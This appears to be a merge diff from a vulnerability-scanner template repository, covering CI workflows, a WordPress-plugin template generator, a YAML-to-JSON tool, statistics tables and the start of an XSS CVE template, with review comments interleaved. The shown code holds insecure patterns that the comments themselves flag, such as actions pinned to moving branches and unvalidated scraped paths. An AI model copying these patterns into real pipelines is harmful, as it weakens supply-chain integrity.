Merge branch 'main' of https://github.com/projectdiscovery/nuclei-templates into pr/6422
commit
b821ccbaf9
|
@ -0,0 +1,30 @@
|
|||
# Set to true to add reviewers to pull requests
|
||||
addReviewers: true
|
||||
|
||||
# Set to true to add assignees to pull requests
|
||||
addAssignees: true
|
||||
|
||||
# A list of reviewers to be added to pull requests (GitHub user name)
|
||||
reviewers:
|
||||
- ritikchaddha
|
||||
- DhiyaneshGeek
|
||||
- pussycat0x
|
||||
|
||||
# A number of reviewers added to the pull request
|
||||
# Set 0 to add all the reviewers (default: 0)
|
||||
numberOfReviewers: 1
|
||||
|
||||
# A list of assignees, overrides reviewers if set
|
||||
assignees:
|
||||
- DhiyaneshGeek
|
||||
- pussycat0x
|
||||
- ritikchaddha
|
||||
|
||||
# A number of assignees to add to the pull request
|
||||
# Set to 0 to add all of the assignees.
|
||||
# Uses numberOfReviewers if unset.
|
||||
numberOfAssignees: 1
|
||||
|
||||
# A list of keywords to be skipped the process that add reviewers if pull requests include it
|
||||
# skipKeywords:
|
||||
# - wip
|
|
@ -0,0 +1,10 @@
|
|||
beautifulsoup4==4.11.1
|
||||
bs4==0.0.1
|
||||
certifi==2022.9.24
|
||||
charset-normalizer==2.1.1
|
||||
idna==3.4
|
||||
Markdown==3.4.1
|
||||
requests==2.28.1
|
||||
soupsieve==2.3.2.post1
|
||||
termcolor==2.1.1
|
||||
urllib3==1.26.13
|
|
@ -0,0 +1,185 @@
|
|||
#!/usr/bin/env python3
|
||||
|
||||
'''
|
||||
This script reads the URL https://wordpress.org/plugins/browse/popular/ until page 10, extract each plugin name and namespace,
|
||||
then in http://plugins.svn.wordpress.org/ website, looks for the "Stable tag" inside the readme.txt and extract the last version
|
||||
number from trunk branch. Finally generates a template and a payload file with last version number to be used during scan that
|
||||
compares the detect version with the payload version.
|
||||
|
||||
The generated template also includes the tags top-100 and top-200 allowing filtering.
|
||||
|
||||
e.g.
|
||||
nuclei -t technologies/wordpress/plugins -tags top-100 -u https://www.example.com
|
||||
'''
|
||||
|
||||
__author__ = "ricardomaia"
|
||||
|
||||
from time import sleep
|
||||
from bs4 import BeautifulSoup
|
||||
import requests
|
||||
import re
|
||||
from markdown import markdown
|
||||
import os
|
||||
from termcolor import colored, cprint
|
||||
|
||||
# Regex to extract the name of th plugin from the URL
|
||||
regex = r"https://wordpress.org/plugins/(\w.+)/"
|
||||
|
||||
ranking = 1
|
||||
|
||||
# Top 200 Wordpress Plugins
|
||||
for page_number in range(1, 11):
|
||||
|
||||
html = requests.get(url=f"https://wordpress.org/plugins/browse/popular/page/{page_number}", headers={
|
||||
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
|
||||
"Accept-Language": "en-US,en;q=0.9",
|
||||
"Accept-Encoding": "gzip, deflate",
|
||||
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
|
||||
"Connection": "keep-alive",
|
||||
"Upgrade-Insecure-Requests": "1",
|
||||
"Cache-Control": "max-age=0",
|
||||
"Pragma": "no-cache",
|
||||
}).content
|
||||
|
||||
# Parse HTML
|
||||
soup = BeautifulSoup(html, 'html.parser')
|
||||
results = soup.find(id="main")
|
||||
articles = results.find_all("article", class_="plugin-card")
|
||||
|
||||
# Setting the top tag
|
||||
top_tag = "top-100,top-200" if page_number <= 5 else "top-200"
|
||||
|
||||
# Get each plugin in the page
|
||||
for article in articles:
|
||||
|
||||
full_title = article.find("h3", class_="entry-title").get_text()
|
||||
regex_remove_quotes = r"[\"`:]"
|
||||
subst_remove_quotes = "'"
|
||||
title = re.sub(regex_remove_quotes, subst_remove_quotes, full_title)
|
||||
|
||||
link = article.find("a").get("href")
|
||||
name = re.search(regex, link).group(1)
|
||||
|
||||
cprint(f"Title: {title}", "cyan")
|
||||
cprint(f"Link: {link}", "yellow")
|
||||
cprint(f"Name: {name} - Ranking: {ranking}", "green")
|
||||
print(f"Page Number: {page_number}")
|
||||
print(f"Top Tag: {top_tag}")
|
||||
print(f"http://plugins.svn.wordpress.org/{name}/trunk/readme.txt")
|
||||
ranking += 1
|
||||
|
||||
sleep(0.2)
|
||||
|
||||
# Get the readme.txt file from SVN
|
||||
readme = requests.get(
|
||||
url=f"http://plugins.svn.wordpress.org/{name}/trunk/readme.txt",
|
||||
headers={
|
||||
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36",
|
||||
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
|
||||
"Accept-Encoding": "gzip, deflate",
|
||||
"Accept-Language": "pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7,es;q=0.6",
|
||||
"Cache-Control": "no-cache",
|
||||
"Connection": "keep-alive",
|
||||
"Host": "plugins.svn.wordpress.org",
|
||||
"Pragma": "no-cache",
|
||||
"Upgrade-Insecure-Requests": "1",
|
||||
"Referer": "http://plugins.svn.wordpress.org/{name}/trunk/"}).content
|
||||
|
||||
# Extract the plugin version
|
||||
try:
|
||||
version = re.search(r"(?i)Stable.tag:\s+([\w.]+)",
|
||||
readme.decode("utf-8")).group(1)
|
||||
except:
|
||||
version = "N/A"
|
||||
|
||||
# Extract the plugin description
|
||||
try:
|
||||
description_markdown = re.search(
|
||||
r"(?i)==.Description.==\W+\n?(.*)", readme.decode("utf-8")).group(1)
|
||||
html = markdown(description_markdown)
|
||||
full_description = BeautifulSoup(html, 'html.parser').get_text()
|
||||
regex_max_length = r"(\b.{80}\b)"
|
||||
subst_max_lenght = "\\g<1>\\n "
|
||||
description = re.sub(
|
||||
regex_max_length, subst_max_lenght, full_description, 0, re.MULTILINE)
|
||||
except:
|
||||
description = "N/A"
|
||||
|
||||
print(f"Version: {version}")
|
||||
print(f"Description: {description}")
|
||||
|
||||
# Write the plugin template to file
|
||||
template = f'''id: wordpress-{name}
|
||||
|
||||
info:
|
||||
name: {title} Detection
|
||||
author: ricardomaia
|
||||
severity: info
|
||||
reference:
|
||||
- https://wordpress.org/plugins/{name}/
|
||||
metadata:
|
||||
plugin_namespace: {name}
|
||||
wpscan: https://wpscan.com/plugin/{name}
|
||||
tags: tech,wordpress,wp-plugin,{top_tag}
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
||||
path:
|
||||
- "{{{{BaseURL}}}}/wp-content/plugins/{name}/readme.txt"
|
||||
|
||||
payloads:
|
||||
last_version: helpers/wordpress/plugins/{name}.txt
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
internal: true
|
||||
name: internal_detected_version
|
||||
group: 1
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
|
||||
- type: regex
|
||||
part: body
|
||||
name: detected_version
|
||||
group: 1
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: dsl
|
||||
name: "outdated_version"
|
||||
dsl:
|
||||
- compare_versions(internal_detected_version, concat("< ", last_version))
|
||||
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
'''
|
||||
|
||||
work_dir = os.getcwd()
|
||||
print(f"Current working directory: {work_dir}")
|
||||
helper_dir = f"{work_dir}/helpers/wordpress/plugins"
|
||||
template_dir = f"{work_dir}/technologies/wordpress/plugins"
|
||||
|
||||
if not os.path.exists(helper_dir):
|
||||
os.makedirs(helper_dir)
|
||||
|
||||
if not os.path.exists(template_dir):
|
||||
os.makedirs(template_dir)
|
||||
|
||||
helper_path = f"helpers/wordpress/plugins/{name}.txt"
|
||||
version_file = open(helper_path, "w")
|
||||
version_file.write(version)
|
||||
version_file.close()
|
||||
|
||||
template_path = f"technologies/wordpress/plugins/{name}.yaml"
|
||||
template_file = open(template_path, "w") # Dev environment
|
||||
template_file.write(template)
|
||||
template_file.close()
|
||||
|
||||
print("--------------------------------------------")
|
||||
print("\n")
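Review bot: `name` is captured from the scraped link by `regex = r"https://wordpress.org/plugins/(\w.+)/"` and then used unvalidated as a path component in `helper_path`, `template_path` and the template `id:`; `.+` also matches `/`, so a link whose path carries an extra segment would make the script write outside `helpers/wordpress/plugins` and `technologies/wordpress/plugins`. Restricting the capture to the slug alphabet, `regex = r"https://wordpress.org/plugins/([\w-]+)/"`, keeps the written paths inside those directories (note `\w` alone does not match the hyphen that most plugin slugs contain, which is why `.+` was doing the work). The readme and its `Stable tag` are fetched over plain `http://plugins.svn.wordpress.org/...` and written into files the WordPress Plugins Update workflow auto-commits, so the fetch should use `https://` to preserve the integrity of what lands in the repository. The `Referer` header value is not an f-string, so the literal text `{name}` is sent; it needs the `f` prefix. Both bare `except:` clauses would also hide unrelated errors, and the cases these lines actually raise are `except (AttributeError, UnicodeDecodeError):` (no match, or a non-UTF-8 readme); a failed fetch such as a 404 page likewise ends in `version = "N/A"` being written to the payload file the template compares against, so checking `readme` status before the regex would be worth it.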
|
|
@ -0,0 +1,92 @@
|
|||
package main
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"io/ioutil"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"strings"
|
||||
|
||||
"gopkg.in/yaml.v3"
|
||||
)
|
||||
|
||||
type Classification struct {
|
||||
CVSSScore string `yaml:"cvss-score,omitempty"`
|
||||
}
|
||||
|
||||
type Info struct {
|
||||
Name string `yaml:"name"`
|
||||
Severity string `yaml:"severity"`
|
||||
Description string `yaml:"description"`
|
||||
Classification Classification `yaml:"classification,omitempty"`
|
||||
}
|
||||
|
||||
type Data struct {
|
||||
ID string `yaml:"id"`
|
||||
Info Info `yaml:"info"`
|
||||
FilePath string `json:"file_path"`
|
||||
}
|
||||
|
||||
func main() {
|
||||
if len(os.Args) != 3 {
|
||||
fmt.Println("Usage: go run main.go <directory> <output_file>")
|
||||
os.Exit(1)
|
||||
}
|
||||
|
||||
directory := os.Args[1]
|
||||
outputFile := os.Args[2]
|
||||
|
||||
var data []Data
|
||||
|
||||
err := filepath.Walk(directory, func(path string, info os.FileInfo, err error) error {
|
||||
if strings.HasSuffix(path, ".yaml") || strings.HasSuffix(path, ".yml") {
|
||||
yamlFile, err := ioutil.ReadFile(path)
|
||||
if err != nil {
|
||||
fmt.Printf("Error reading YAML file %s: %v\n", path, err)
|
||||
return err
|
||||
}
|
||||
|
||||
var d Data
|
||||
err = yaml.Unmarshal(yamlFile, &d)
|
||||
if err != nil {
|
||||
fmt.Printf("Error unmarshalling YAML file %s: %v\n", path, err)
|
||||
return err
|
||||
}
|
||||
if d.Info.Classification.CVSSScore == "" {
|
||||
d.Info.Classification.CVSSScore = "N/A"
|
||||
}
|
||||
if d.Info.Classification == (Classification{}) {
|
||||
d.Info.Classification.CVSSScore = "N/A"
|
||||
}
|
||||
d.FilePath = path
|
||||
|
||||
data = append(data, d)
|
||||
}
|
||||
return nil
|
||||
})
|
||||
|
||||
if err != nil {
|
||||
fmt.Printf("Error reading directory: %v\n", err)
|
||||
os.Exit(1)
|
||||
}
|
||||
|
||||
var jsonData []byte
|
||||
for _, d := range data {
|
||||
temp, err := json.Marshal(d)
|
||||
if err != nil {
|
||||
fmt.Printf("Error marshalling JSON: %v\n", err)
|
||||
os.Exit(1)
|
||||
}
|
||||
jsonData = append(jsonData, temp...)
|
||||
jsonData = append(jsonData, byte('\n'))
|
||||
}
|
||||
err = ioutil.WriteFile(outputFile, jsonData, 0644)
|
||||
if err != nil {
|
||||
fmt.Printf("Error writing JSON data to file: %v\n", err)
|
||||
os.Exit(1)
|
||||
}
|
||||
|
||||
fmt.Println("JSON data written to", outputFile)
|
||||
}
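Review bot: The `filepath.Walk` callback never inspects its incoming `err` argument (third parameter of `func(path string, info os.FileInfo, err error) error`); the name is immediately shadowed by `yamlFile, err := ioutil.ReadFile(path)`, so an unreadable directory is skipped silently and the walk still returns nil, letting an incomplete `cves.json` be committed. Add `if err != nil { return err }` as the first statement of the callback. `d.FilePath = path` stores the path as walked, and the Generate JSON Metadata workflow passes the absolute `/home/runner/work/nuclei-templates/nuclei-templates/cves/` directory, so the committed JSON carries runner-specific absolute paths; `filepath.Rel(directory, path)` would make it repository-relative. The `if d.Info.Classification == (Classification{})` block is redundant with the `CVSSScore == ""` check directly above it, since `Classification` has only that one field. `ioutil.ReadFile`/`ioutil.WriteFile` are deprecated since Go 1.16 and the workflow uses Go 1.19, so `os.ReadFile`/`os.WriteFile` can replace them and drop the import.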
|
||||
|
|
@ -3,28 +3,26 @@ name: ✍🏻 CVE Annotate
|
|||
on:
|
||||
push:
|
||||
branches:
|
||||
- master
|
||||
- main
|
||||
paths:
|
||||
- 'cves/**.yaml'
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
docs:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v2
|
||||
- uses: actions/checkout@v3
|
||||
with:
|
||||
fetch-depth: 0
|
||||
|
||||
- name: Get Github tag
|
||||
id: meta
|
||||
run: |
|
||||
curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name | xargs -I {} echo TAG={} >> $GITHUB_OUTPUT
|
||||
- name: Set up Go
|
||||
uses: actions/setup-go@v3
|
||||
with:
|
||||
go-version: 1.19
|
||||
|
||||
- name: Setup CVE annotate
|
||||
if: steps.meta.outputs.TAG != ''
|
||||
env:
|
||||
VERSION: ${{ steps.meta.outputs.TAG }}
|
||||
run: |
|
||||
wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/cve-annotate.zip
|
||||
sudo unzip cve-annotate.zip -d /usr/local/bin
|
||||
working-directory: /tmp
|
||||
- name: cve-annotate install
|
||||
run: go install -v github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@latest
|
||||
|
||||
- name: Generate CVE Annotations
|
||||
id: cve-annotate
|
||||
|
|
|
@ -0,0 +1,38 @@
|
|||
name: Generate JSON Metadata of CVE Templates
|
||||
|
||||
on:
|
||||
push:
|
||||
tags:
|
||||
- '*'
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
build:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@master
|
||||
- name: Set up Go
|
||||
uses: actions/setup-go@v3
|
||||
with:
|
||||
go-version: 1.19
|
||||
check-latest: true
|
||||
|
||||
- name: run yaml2json.go to generate cves.json
|
||||
run: |
|
||||
go env -w GO111MODULE=off
|
||||
go get gopkg.in/yaml.v3
|
||||
go run .github/scripts/yaml2json.go /home/runner/work/nuclei-templates/nuclei-templates/cves/ cves.json
|
||||
|
||||
- name: Commit files
|
||||
run: |
|
||||
git pull
|
||||
git add cves.json
|
||||
git config --local user.email "action@github.com"
|
||||
git config --local user.name "GitHub Action"
|
||||
git commit -m "Auto Generated cves.json [$(date)] :robot:" -a
|
||||
|
||||
- name: Push changes
|
||||
uses: ad-m/github-push-action@master
|
||||
with:
|
||||
github_token: ${{ secrets.GITHUB_TOKEN }}
|
||||
branch: master
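Review bot: `ad-m/github-push-action@master` and `actions/checkout@master` reference moving branches, so a push to either upstream branch changes what this job executes while it holds `secrets.GITHUB_TOKEN` with write access to the repository; pin third-party actions to a full commit SHA, or at least to a release tag as `actions/setup-go@v3` already is. The same `@master` references appear in the Template Checksum and WordPress Plugins Update workflow hunks. `go env -w GO111MODULE=off` followed by `go get gopkg.in/yaml.v3` fetches an unpinned module version in GOPATH mode on every run; a `go.mod` next to `yaml2json.go` would fix the version and let `go run` resolve it without the two lines. The hard-coded `/home/runner/work/nuclei-templates/nuclei-templates/cves/` argument can be written as `$GITHUB_WORKSPACE/cves/` so the job does not depend on the runner layout.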
|
|
@ -3,7 +3,9 @@ name: 🥳 New Template List
|
|||
on:
|
||||
push:
|
||||
branches:
|
||||
- master
|
||||
- main
|
||||
paths:
|
||||
- '**.yaml'
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
|
|
|
@ -1,6 +1,10 @@
|
|||
name: ❄️ YAML Lint
|
||||
|
||||
on: [push, pull_request]
|
||||
on:
|
||||
pull_request:
|
||||
paths:
|
||||
- '**.yaml'
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
build:
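Review bot: Dropping `push` from the trigger (the `on: [push, pull_request]` line is replaced by `pull_request:` with a `**.yaml` path filter) means commits that reach the branch without a pull request are never linted; in this same commit the WordPress Plugins Update workflow pushes generated templates directly with `git add --all`, so those files skip lint entirely. Keeping a `push:` trigger on the default branches with the same `paths:` filter closes that gap. The Template Validate hunk makes the identical change to its `on:` block and has the same consequence. The job body continues outside the hunk.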
|
||||
|
|
|
@ -0,0 +1,41 @@
|
|||
name: 📝 Template Checksum
|
||||
|
||||
on:
|
||||
push:
|
||||
tags:
|
||||
- '*'
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
build:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@master
|
||||
- name: Set up Go
|
||||
uses: actions/setup-go@v3
|
||||
with:
|
||||
go-version: 1.19
|
||||
check-latest: true
|
||||
cache: true
|
||||
|
||||
- name: install checksum generator
|
||||
run: |
|
||||
go install -v github.com/projectdiscovery/nuclei/v2/cmd/generate-checksum@dev
|
||||
|
||||
- name: generate checksum
|
||||
run: |
|
||||
generate-checksum /home/runner/work/nuclei-templates/nuclei-templates/ templates-checksum.txt
|
||||
|
||||
- name: Commit files
|
||||
run: |
|
||||
git pull
|
||||
git add templates-checksum.txt
|
||||
git config --local user.email "action@github.com"
|
||||
git config --local user.name "GitHub Action"
|
||||
git commit -m "Auto Generated Templates Checksum [$(date)] :robot:" -a
|
||||
|
||||
- name: Push changes
|
||||
uses: ad-m/github-push-action@master
|
||||
with:
|
||||
github_token: ${{ secrets.GITHUB_TOKEN }}
|
||||
branch: master
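Review bot: `go install -v github.com/projectdiscovery/nuclei/v2/cmd/generate-checksum@dev` builds the tool that produces the integrity artifact `templates-checksum.txt` from the moving `dev` branch, so the committed checksum file's format and contents can change between runs with no change in this repository, and a broken or compromised `dev` state flows straight into an auto-pushed commit. Pin it to a tagged release (`@vX.Y.Z`, version to be filled in) instead. The `Commit files` step runs `git commit ... -a` unconditionally, and git exits non-zero when there is nothing to commit, so a run that changes nothing fails the job; the WordPress Plugins Update workflow in this commit guards its commit with a change count and the same pattern fits here.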
|
|
@ -3,18 +3,23 @@ name: 📑 Template-DB Indexer
|
|||
on:
|
||||
push:
|
||||
branches:
|
||||
- master
|
||||
- main
|
||||
paths:
|
||||
- '**.yaml'
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
index:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/setup-go@v2
|
||||
- name: Set up Go
|
||||
uses: actions/setup-go@v3
|
||||
with:
|
||||
go-version: 1.17
|
||||
go-version: 1.19
|
||||
check-latest: true
|
||||
cache: true
|
||||
|
||||
- name: Intalling Indexer
|
||||
- name: Installing Indexer
|
||||
run: |
|
||||
git config --global url."https://${{ secrets.ACCESS_TOKEN }}@github".insteadOf https://github
|
||||
git clone https://github.com/projectdiscovery/nucleish-api.git
|
||||
|
|
|
@ -1,26 +1,26 @@
|
|||
name: 🛠 Template Validate
|
||||
|
||||
on: [ push, pull_request ]
|
||||
on:
|
||||
pull_request:
|
||||
paths:
|
||||
- '**.yaml'
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
build:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v2
|
||||
- uses: actions/checkout@v3
|
||||
with:
|
||||
fetch-depth: 0
|
||||
|
||||
- name: Get Github tag
|
||||
id: meta
|
||||
run: |
|
||||
curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name | xargs -I {} echo TAG={} >> $GITHUB_OUTPUT
|
||||
- name: Set up Go
|
||||
uses: actions/setup-go@v3
|
||||
with:
|
||||
go-version: 1.19
|
||||
|
||||
- name: Setup Nuclei
|
||||
if: steps.meta.outputs.TAG != ''
|
||||
env:
|
||||
VERSION: ${{ steps.meta.outputs.TAG }}
|
||||
run: |
|
||||
wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/nuclei_${VERSION:1}_linux_amd64.zip
|
||||
sudo unzip nuclei*.zip -d /usr/local/bin
|
||||
working-directory: /tmp
|
||||
- name: nuclei install
|
||||
run: go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
|
||||
|
||||
- name: Template Validation
|
||||
run: |
|
||||
|
|
|
@ -10,10 +10,14 @@ jobs:
|
|||
build:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@master
|
||||
- uses: actions/setup-go@v2
|
||||
- uses: actions/checkout@v3
|
||||
with:
|
||||
go-version: 1.18
|
||||
fetch-depth: 0
|
||||
|
||||
- name: Set up Go
|
||||
uses: actions/setup-go@v3
|
||||
with:
|
||||
go-version: 1.19
|
||||
|
||||
- name: Installing Template Stats
|
||||
run: |
|
||||
|
@ -52,4 +56,3 @@ jobs:
|
|||
uses: ad-m/github-push-action@master
|
||||
with:
|
||||
github_token: ${{ secrets.GITHUB_TOKEN }}
|
||||
branch: master
|
|
@ -0,0 +1,45 @@
|
|||
name: ✨ WordPress Plugins - Update
|
||||
|
||||
on:
|
||||
schedule:
|
||||
- cron: "0 4 * * *" # every day at 4am UTC
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
Update:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Check out repository code
|
||||
uses: actions/checkout@v3
|
||||
with:
|
||||
persist-credentials: false # otherwise, the token used is the GITHUB_TOKEN, instead of your personal token
|
||||
fetch-depth: 0 # otherwise, you will failed to push refs to dest repo
|
||||
|
||||
- name: Install Python3
|
||||
uses: actions/setup-python@v4
|
||||
with:
|
||||
python-version: "3.10"
|
||||
- run: |
|
||||
python -m pip install --upgrade pip
|
||||
pip install -r .github/scripts/wordpress-plugins-update-requirements.txt
|
||||
|
||||
- name: Update Templates
|
||||
id: update-templates
|
||||
run: |
|
||||
python3 .github/scripts/wordpress-plugins-update.py
|
||||
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
|
||||
|
||||
- name: Commit files
|
||||
if: steps.update-templates.outputs.CHANGES > 0
|
||||
run: |
|
||||
git config --local user.email "action@github.com"
|
||||
git config --local user.name "GitHub Action"
|
||||
git add --all
|
||||
git commit -m "Auto WordPress Plugins Update [$(date)] :robot:"
|
||||
|
||||
- name: Push changes
|
||||
if: steps.update-templates.outputs.CHANGES > 0
|
||||
uses: ad-m/github-push-action@master
|
||||
with:
|
||||
github_token: ${{ secrets.GITHUB_TOKEN }}
|
||||
branch: ${{ github.ref }}
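Review bot: The `Commit files` and `Push changes` steps commit everything `wordpress-plugins-update.py` wrote (`git add --all`) straight to `${{ github.ref }}`, and those files are generated from content fetched from the network at run time; nothing on this path validates the templates before they land on the branch, and the YAML Lint and Template Validate workflows in this commit run only on `pull_request`. Either have this job open a pull request instead of pushing, or run the validator over `technologies/wordpress/plugins` before the `Commit files` step. The comment on `persist-credentials: false` refers to a personal token, but the push step uses `secrets.GITHUB_TOKEN`, so one of the two should be reconciled. `pip install -r .github/scripts/wordpress-plugins-update-requirements.txt` pins by version only; adding hashes to that file and passing `--require-hashes` pins the exact artifacts installed on the runner.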
|
|
@ -0,0 +1,11 @@
|
|||
cves/2022/CVE-2022-1168.yaml
|
||||
cves/2022/CVE-2022-39195.yaml
|
||||
exposed-panels/connect-box-login.yaml
|
||||
exposed-panels/esphome-panel.yaml
|
||||
exposed-panels/sqlbuddy-panel.yaml
|
||||
misconfiguration/esphome-dashboard.yaml
|
||||
vulnerabilities/other/academy-lms-xss.yaml
|
||||
vulnerabilities/other/slims-xss.yaml
|
||||
vulnerabilities/other/sound4-file-disclosure.yaml
|
||||
vulnerabilities/other/tikiwiki-xss.yaml
|
||||
"\342\200\216\342\200\216misconfiguration/sound4-directory-listing.yaml"
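Review bot: The last entry is `misconfiguration/sound4-directory-listing.yaml` prefixed by two U+200E LEFT-TO-RIGHT MARK characters (`\342\200\216` is how git prints the UTF-8 bytes `E2 80 8E` in a quoted path), so it is not the same path as the visible text and presumably the template itself was committed under that invisible-different name. Any tooling that matches on the visible path will not find the file, and the entry looks like a duplicate of a plain path while being distinct. Rename the template to the plain `misconfiguration/sound4-directory-listing.yaml` and record that unquoted path here.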
|
24
README.md
|
@ -41,19 +41,19 @@ An overview of the nuclei template project, including statistics on unique tags,
|
|||
## Nuclei Templates Top 10 statistics
|
||||
|
||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 1551 | dhiyaneshdk | 701 | cves | 1528 | info | 1666 | http | 4323 |
|
||||
| panel | 778 | daffainfo | 662 | exposed-panels | 780 | high | 1152 | file | 78 |
|
||||
| edb | 582 | pikpikcu | 344 | vulnerabilities | 519 | medium | 835 | network | 77 |
|
||||
| exposure | 551 | pdteam | 274 | misconfiguration | 361 | critical | 552 | dns | 17 |
|
||||
| xss | 541 | geeknik | 206 | technologies | 319 | low | 281 | | |
|
||||
| lfi | 519 | dwisiswant0 | 171 | exposures | 308 | unknown | 25 | | |
|
||||
| wordpress | 470 | pussycat0x | 171 | token-spray | 236 | | | | |
|
||||
| cve2021 | 369 | 0x_akoko | 170 | workflows | 190 | | | | |
|
||||
| wp-plugin | 365 | ritikchaddha | 163 | default-logins | 116 | | | | |
|
||||
| tech | 357 | princechaddha | 153 | file | 78 | | | | |
|
||||
|-----------|-------|--------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 1575 | dhiyaneshdk | 708 | cves | 1552 | info | 1919 | http | 4631 |
|
||||
| panel | 803 | daffainfo | 662 | exposed-panels | 805 | high | 1170 | network | 84 |
|
||||
| wordpress | 684 | pikpikcu | 344 | technologies | 529 | medium | 849 | file | 78 |
|
||||
| edb | 583 | pdteam | 273 | vulnerabilities | 528 | critical | 568 | dns | 17 |
|
||||
| wp-plugin | 579 | geeknik | 220 | misconfiguration | 372 | low | 294 | | |
|
||||
| exposure | 573 | ricardomaia | 210 | exposures | 325 | unknown | 26 | | |
|
||||
| tech | 567 | pussycat0x | 181 | token-spray | 237 | | | | |
|
||||
| xss | 549 | dwisiswant0 | 171 | workflows | 190 | | | | |
|
||||
| lfi | 522 | 0x_akoko | 171 | default-logins | 122 | | | | |
|
||||
| cve2021 | 375 | ritikchaddha | 167 | file | 78 | | | | |
|
||||
|
||||
**321 directories, 4733 files**.
|
||||
**337 directories, 5307 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
4546
TEMPLATES-STATS.md
22
TOP-10.md
|
@ -1,12 +1,12 @@
|
|||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 1551 | dhiyaneshdk | 701 | cves | 1528 | info | 1666 | http | 4323 |
|
||||
| panel | 778 | daffainfo | 662 | exposed-panels | 780 | high | 1152 | file | 78 |
|
||||
| edb | 582 | pikpikcu | 344 | vulnerabilities | 519 | medium | 835 | network | 77 |
|
||||
| exposure | 551 | pdteam | 274 | misconfiguration | 361 | critical | 552 | dns | 17 |
|
||||
| xss | 541 | geeknik | 206 | technologies | 319 | low | 281 | | |
|
||||
| lfi | 519 | dwisiswant0 | 171 | exposures | 308 | unknown | 25 | | |
|
||||
| wordpress | 470 | pussycat0x | 171 | token-spray | 236 | | | | |
|
||||
| cve2021 | 369 | 0x_akoko | 170 | workflows | 190 | | | | |
|
||||
| wp-plugin | 365 | ritikchaddha | 163 | default-logins | 116 | | | | |
|
||||
| tech | 357 | princechaddha | 153 | file | 78 | | | | |
|
||||
|-----------|-------|--------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 1575 | dhiyaneshdk | 708 | cves | 1552 | info | 1919 | http | 4631 |
|
||||
| panel | 803 | daffainfo | 662 | exposed-panels | 805 | high | 1170 | network | 84 |
|
||||
| wordpress | 684 | pikpikcu | 344 | technologies | 529 | medium | 849 | file | 78 |
|
||||
| edb | 583 | pdteam | 273 | vulnerabilities | 528 | critical | 568 | dns | 17 |
|
||||
| wp-plugin | 579 | geeknik | 220 | misconfiguration | 372 | low | 294 | | |
|
||||
| exposure | 573 | ricardomaia | 210 | exposures | 325 | unknown | 26 | | |
|
||||
| tech | 567 | pussycat0x | 181 | token-spray | 237 | | | | |
|
||||
| xss | 549 | dwisiswant0 | 171 | workflows | 190 | | | | |
|
||||
| lfi | 522 | 0x_akoko | 171 | default-logins | 122 | | | | |
|
||||
| cve2021 | 375 | ritikchaddha | 167 | file | 78 | | | | |
|
||||
|
|
|
@ -1,18 +1,21 @@
|
|||
id: CVE-2008-6465
|
||||
|
||||
info:
|
||||
name: Parallels H-Sphere - Cross Site Scripting
|
||||
name: Parallels H-Sphere 3.0.0 P9/3.1 P1 - Cross-Site Scripting
|
||||
author: edoardottt
|
||||
severity: medium
|
||||
description: |
|
||||
Multiple cross-site scripting (XSS) vulnerabilities in login.php in webshell4 in Parallels H-Sphere 3.0.0 P9 and 3.1 P1 allow remote attackers to inject arbitrary web script or HTML via the (1) err, (2) errorcode, and (3) login parameters.
|
||||
